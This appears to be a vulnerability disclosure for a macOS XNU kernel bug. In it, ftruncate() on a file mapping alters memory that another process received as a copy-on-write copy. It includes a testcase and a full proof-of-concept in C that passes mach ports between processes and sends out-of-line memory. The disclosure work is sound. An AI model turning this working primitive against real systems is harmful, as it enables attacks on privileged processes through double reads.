1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 312 313 314 315 316 317 318 319 320 321 322 323 324 325 326 327 328 329 330 331 332 333 334 335 336 337 338 339 340 341 342 343 344 345 346 347 348 349 350 351 352 353 354 355 356 357 358 359 360 361 362 363 364 365 366 367 368 369 370 371 372 373 374 375 376 377 378 379 380 381 382 383 384 385 386 387 388 389 390 391 392 393 394 395 396 397 398 399 400 401 402 403 404 405 406 407 408 409 410 411 412 413 414 415 416 417 418 419 420 421 422 423 424 425 426 427 428 429 430 431 432 433 434 435 436 437 438 439 440 441 442 443 444 445 446 447 448 449 450 451 452 453 454 455 456 457 458 459 460 461 462 463 464 465 |
/* XNU has various interfaces that permit creating copy-on-write copies of data between processes, including out-of-line message descriptors in mach messages. It is important that the copied memory is protected against later modifications by the source process; otherwise, the source process might be able to exploit double-reads in the destination process. This copy-on-write behavior works not only with anonymous memory, but also with file mappings. This means that, if the filesystem mutates the file contents (e.g. because the ftruncate() syscall was used), the filesystem must inform the memory management subsystem so that affected pages can be deduplicated. If this doesn't happen, that's a security bug. ubc_setsize_ex() roughly has the following logic: Step 1: If the file grows or stays at the same size, do nothing and return. Step 2: If the new file size is not divisible by the page size, zero out the end of the page that is now at the end of the file. Step 3: If there are pages that were previously part of the file but aren't anymore, tell the memory management subsystem to invalidate them. Step 4: Return. Step 2 is implemented as follows: =========== /* * new EOF ends up in the middle of a page * zero the tail of this page if it's currently * present in the cache kret = ubc_create_upl_kernel(vp, lastpg, PAGE_SIZE, &upl, &pl, UPL_SET_LITE, VM_KERN_MEMORY_FILE); if (kret != KERN_SUCCESS) panic("ubc_setsize: ubc_create_upl (error = %d)\n", kret); if (upl_valid_page(pl, 0)) cluster_zero(upl, (uint32_t)lastoff, PAGE_SIZE - (uint32_t)lastoff, NULL); ubc_upl_abort_range(upl, 0, PAGE_SIZE, UPL_ABORT_FREE_ON_EMPTY); =========== Call graph: ubc_create_upl_kernel(uplflags=UPL_SET_LITE) -> memory_object_upl_request(cntrl_flags=UPL_SET_LITE|UPL_NO_SYNC|UPL_CLEAN_IN_PLACE|UPL_SET_INTERNAL) -> vm_object_upl_request(cntrl_flags=UPL_SET_LITE|UPL_NO_SYNC|UPL_CLEAN_IN_PLACE|UPL_SET_INTERNAL) vm_object_upl_request() can perform COW deduplication, but only if the UPL_WILL_MODIFY flag is set, which isn't set here. A simple testcase: =========== $ cat buggycow2.c #include <sys/mman.h> #include <fcntl.h> #include <err.h> #include <stdio.h> #include <mach/mach.h> #include <mach/mach_vm.h> #include <unistd.h> int main(void) { setbuf(stdout, NULL); int fd = open("testfile", O_RDWR|O_CREAT|O_TRUNC, 0600); if (fd == -1) err(1, "open"); if (ftruncate(fd, 0x4000)) err(1, "ftruncate 1"); char *mapping = mmap(NULL, 0x4000, PROT_READ|PROT_WRITE, MAP_SHARED, fd, 0); if (mapping == MAP_FAILED) err(1, "mmap"); *(unsigned int *)(mapping + 0x3000) = 0x41414141; pointer_t cow_mapping; mach_msg_type_number_t cow_mapping_size; if (vm_read(mach_task_self(), (vm_address_t)mapping, 0x4000, &cow_mapping, &cow_mapping_size) != KERN_SUCCESS) errx(1, "vm read"); if (cow_mapping_size != 0x4000) errx(1, "vm read size"); printf("orig: 0x%x cow: 0x%x\n", *(unsigned int *)(mapping + 0x3000), *(unsigned int *)(cow_mapping+0x3000)); if (ftruncate(fd, 0x3001)) err(1, "ftruncate 2"); printf("orig: 0x%x cow: 0x%x\n", *(unsigned int *)(mapping + 0x3000), *(unsigned int *)(cow_mapping+0x3000)); } $ cc -o buggycow2 buggycow2.c $ ./buggycow2 orig: 0x41414141 cow: 0x41414141 orig: 0x41 cow: 0x41 $ =========== To demonstrate that this also works with out-of-line memory sent over mach ports, I am attaching a more complicated PoC that was mostly written by Ian. It sends an out-of-line descriptor over a mach port, then changes the memory seen by the recipient. Usage: =========== $ cc -o mach_truncate_poc mach_truncate_poc.c $ ./mach_truncate_poc [+] child got stashed port [+] child sent hello message to parent over shared port [+] parent received hello message from child [+] child restored stolen port [+] file created [+] child sent message to parent [+] parent got an OOL descriptor for 4000 bytes, mapped COW at: 0x10c213000 [+] parent reads: 41414141 [+] telling child to try to change what I see! [+] child received ping to start trying to change the OOL memory! [+] child called ftruncate() [+] parent got ping message from child, lets try to read again... [+] parent reads: 00000041 $ =========== The simple testcase was tested on 10.14.1 18B75. */ #define RAM_GB 16ULL #define SIZE ((RAM_GB+4ULL) * 1024ULL * 1024ULL * 1024ULL) #include <errno.h> #include <fcntl.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <signal.h> #include <sys/mman.h> #include <sys/stat.h> #include <libkern/OSAtomic.h> #include <mach/mach.h> #include <mach/mach_error.h> #include <mach/mach_vm.h> #include <mach/task.h> #include <mach/task_special_ports.h> #define MACH_ERR(str, err) do { \ if (err != KERN_SUCCESS) {\ mach_error("[-]" str "\n", err); \ exit(EXIT_FAILURE); \ } \ } while(0) #define FAIL(str) do { \ printf("[-] " str "\n");\ exit(EXIT_FAILURE);\ } while (0) #define LOG(str) do { \ printf("[+] " str"\n"); \ } while (0) /*************** * port dancer * ***************/ // set up a shared mach port pair from a child process back to its parent without using launchd // based on the idea outlined by Robert Sesek here: https://robert.sesek.com/2014/1/changes_to_xnu_mach_ipc.html // mach message for sending a port right typedef struct { mach_msg_header_t header; mach_msg_body_t body; mach_msg_port_descriptor_t port; } port_msg_send_t; // mach message for receiving a port right typedef struct { mach_msg_header_t header; mach_msg_body_t body; mach_msg_port_descriptor_t port; mach_msg_trailer_t trailer; } port_msg_rcv_t; typedef struct { mach_msg_header_theader; } simple_msg_send_t; typedef struct { mach_msg_header_theader; mach_msg_trailer_t trailer; } simple_msg_rcv_t; #define STOLEN_SPECIAL_PORT TASK_BOOTSTRAP_PORT // a copy in the parent of the stolen special port such that it can be restored mach_port_t saved_special_port = MACH_PORT_NULL; // the shared port right in the parent mach_port_t shared_port_parent = MACH_PORT_NULL; void setup_shared_port() { kern_return_t err; // get a send right to the port we're going to overwrite so that we can both // restore it for ourselves and send it to our child err = task_get_special_port(mach_task_self(), STOLEN_SPECIAL_PORT, &saved_special_port); MACH_ERR("saving original special port value", err); // allocate the shared port we want our child to have a send right to err = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &shared_port_parent); MACH_ERR("allocating shared port", err); // insert the send right err = mach_port_insert_right(mach_task_self(), shared_port_parent, shared_port_parent, MACH_MSG_TYPE_MAKE_SEND); MACH_ERR("inserting MAKE_SEND into shared port", err); // stash the port in the STOLEN_SPECIAL_PORT slot such that the send right survives the fork err = task_set_special_port(mach_task_self(), STOLEN_SPECIAL_PORT, shared_port_parent); MACH_ERR("setting special port", err); } mach_port_t recover_shared_port_child() { kern_return_t err; // grab the shared port which our parent stashed somewhere in the special ports mach_port_t shared_port_child = MACH_PORT_NULL; err = task_get_special_port(mach_task_self(), STOLEN_SPECIAL_PORT, &shared_port_child); MACH_ERR("child getting stashed port", err); LOG("child got stashed port"); // say hello to our parent and send a reply port so it can send us back the special port to restore // allocate a reply port mach_port_t reply_port; err = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &reply_port); MACH_ERR("child allocating reply port", err); // send the reply port in a hello message simple_msg_send_t msg = {0}; msg.header.msgh_size = sizeof(msg); msg.header.msgh_local_port = reply_port; msg.header.msgh_remote_port = shared_port_child; msg.header.msgh_bits = MACH_MSGH_BITS (MACH_MSG_TYPE_COPY_SEND, MACH_MSG_TYPE_MAKE_SEND_ONCE); err = mach_msg_send(&msg.header); MACH_ERR("child sending task port message", err); LOG("child sent hello message to parent over shared port"); // wait for a message on the reply port containing the stolen port to restore port_msg_rcv_t stolen_port_msg = {0}; err = mach_msg(&stolen_port_msg.header, MACH_RCV_MSG, 0, sizeof(stolen_port_msg), reply_port, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL); MACH_ERR("child receiving stolen port\n", err); // extract the port right from the message mach_port_t stolen_port_to_restore = stolen_port_msg.port.name; if (stolen_port_to_restore == MACH_PORT_NULL) { FAIL("child received invalid stolen port to restore"); } // restore the special port for the child err = task_set_special_port(mach_task_self(), STOLEN_SPECIAL_PORT, stolen_port_to_restore); MACH_ERR("child restoring special port", err); LOG("child restored stolen port"); return shared_port_child; } mach_port_t recover_shared_port_parent() { kern_return_t err; // restore the special port for ourselves err = task_set_special_port(mach_task_self(), STOLEN_SPECIAL_PORT, saved_special_port); MACH_ERR("parent restoring special port", err); // wait for a message from the child on the shared port simple_msg_rcv_t msg = {0}; err = mach_msg(&msg.header, MACH_RCV_MSG, 0, sizeof(msg), shared_port_parent, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL); MACH_ERR("parent receiving child hello message", err); LOG("parent received hello message from child"); // send the special port to our child over the hello message's reply port port_msg_send_t special_port_msg = {0}; special_port_msg.header.msgh_size= sizeof(special_port_msg); special_port_msg.header.msgh_local_port= MACH_PORT_NULL; special_port_msg.header.msgh_remote_port = msg.header.msgh_remote_port; special_port_msg.header.msgh_bits= MACH_MSGH_BITS(MACH_MSGH_BITS_REMOTE(msg.header.msgh_bits), 0) | MACH_MSGH_BITS_COMPLEX; special_port_msg.body.msgh_descriptor_count = 1; special_port_msg.port.name= saved_special_port; special_port_msg.port.disposition = MACH_MSG_TYPE_COPY_SEND; special_port_msg.port.type= MACH_MSG_PORT_DESCRIPTOR; err = mach_msg_send(&special_port_msg.header); MACH_ERR("parent sending special port back to child", err); return shared_port_parent; } /*** end of port dancer code ***/ struct ool_send_msg { mach_msg_header_t hdr; mach_msg_body_t body; mach_msg_ool_descriptor_t desc; }; struct ool_rcv_msg { mach_msg_header_t hdr; mach_msg_body_t body; mach_msg_ool_descriptor_t desc; mach_msg_trailer_t trailer; }; struct ping_send_msg { mach_msg_header_t hdr; }; struct ping_rcv_msg { mach_msg_header_t hdr; mach_msg_trailer_t trailer; }; void do_child(mach_port_t shared_port) { kern_return_t err; // create a reply port to receive an ack that we should truncate the file mach_port_t reply_port; err = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &reply_port); MACH_ERR("child allocating reply port", err); // create a file that is a few pages big int fd = open("testfile", O_RDWR|O_CREAT|O_TRUNC, 0666); if (fd == -1) FAIL("create testfile"); if (ftruncate(fd, 0x4000)) FAIL("resize testfile"); LOG("file created"); void* mapping = mmap(NULL, 0x4000, PROT_READ|PROT_WRITE, MAP_SHARED, fd, 0); if (mapping == MAP_FAILED) FAIL("mmap created file"); *(unsigned int *)mapping = 0x41414141; struct ool_send_msg msg = {0}; msg.hdr.msgh_size = sizeof(msg); msg.hdr.msgh_local_port = reply_port; msg.hdr.msgh_remote_port = shared_port; msg.hdr.msgh_bits = MACH_MSGH_BITS (MACH_MSG_TYPE_COPY_SEND, MACH_MSG_TYPE_MAKE_SEND) | MACH_MSGH_BITS_COMPLEX; msg.body.msgh_descriptor_count = 1; msg.desc.type = MACH_MSG_OOL_DESCRIPTOR; msg.desc.copy = MACH_MSG_VIRTUAL_COPY; msg.desc.deallocate = 0; msg.desc.address = mapping; msg.desc.size = 0x4000; err = mach_msg_send(&msg.hdr); MACH_ERR("child sending OOL message", err); LOG("child sent message to parent"); // wait for an ack to change the file: struct ping_rcv_msg ping_rcv = {0}; ping_rcv.hdr.msgh_size = sizeof(ping_rcv); ping_rcv.hdr.msgh_local_port = reply_port; err = mach_msg_receive(&ping_rcv.hdr); MACH_ERR("child receiving ping to change OOL memory", err); LOG("child received ping to start trying to change the OOL memory!"); // trigger the bug by calling ftruncate() if (ftruncate(fd, 1)) FAIL("truncate file to trigger bug"); LOG("child called ftruncate()"); // send a message to read again: struct ping_send_msg ping = {0}; ping.hdr.msgh_size = sizeof(ping); ping.hdr.msgh_remote_port = shared_port; ping.hdr.msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, 0); err = mach_msg_send(&ping.hdr); MACH_ERR("parent sending ping to child", err); // spin and let our parent kill us while(1){;} } void do_parent(mach_port_t shared_port) { kern_return_t err; // wait for our child to send us an OOL message struct ool_rcv_msg msg = {0}; msg.hdr.msgh_local_port = shared_port; msg.hdr.msgh_size = sizeof(msg); err = mach_msg_receive(&msg.hdr); MACH_ERR("parent receiving child OOL message", err); volatile uint32_t* parent_cow_mapping = msg.desc.address; uint32_t parent_cow_size = msg.desc.size; printf("[+] parent got an OOL descriptor for %x bytes, mapped COW at: %p\n", parent_cow_size, (void*) parent_cow_mapping); printf("[+] parent reads: %08x\n", *parent_cow_mapping); LOG("telling child to try to change what I see!"); mach_port_t parent_to_child_port = msg.hdr.msgh_remote_port; struct ping_send_msg ping = {0}; ping.hdr.msgh_size = sizeof(ping); ping.hdr.msgh_remote_port = parent_to_child_port; ping.hdr.msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, 0); err = mach_msg_send(&ping.hdr); MACH_ERR("parent sending ping to child", err); // wait until we should try to read again: struct ping_rcv_msg ping_rcv = {0}; ping_rcv.hdr.msgh_size = sizeof(ping_rcv); ping_rcv.hdr.msgh_local_port = shared_port; err = mach_msg_receive(&ping_rcv.hdr); MACH_ERR("parent receiving ping to try another read", err); LOG("parent got ping message from child, lets try to read again..."); printf("[+] parent reads: %08x\n", *parent_cow_mapping); } int main(int argc, char** argv) { setup_shared_port(); pid_t child_pid = fork(); if (child_pid == -1) { FAIL("forking"); } if (child_pid == 0) { mach_port_t shared_port_child = recover_shared_port_child(); do_child(shared_port_child); } else { mach_port_t shared_port_parent = recover_shared_port_parent(); do_parent(shared_port_parent); } kill(child_pid, 9); int status; wait(&status); return 0; } |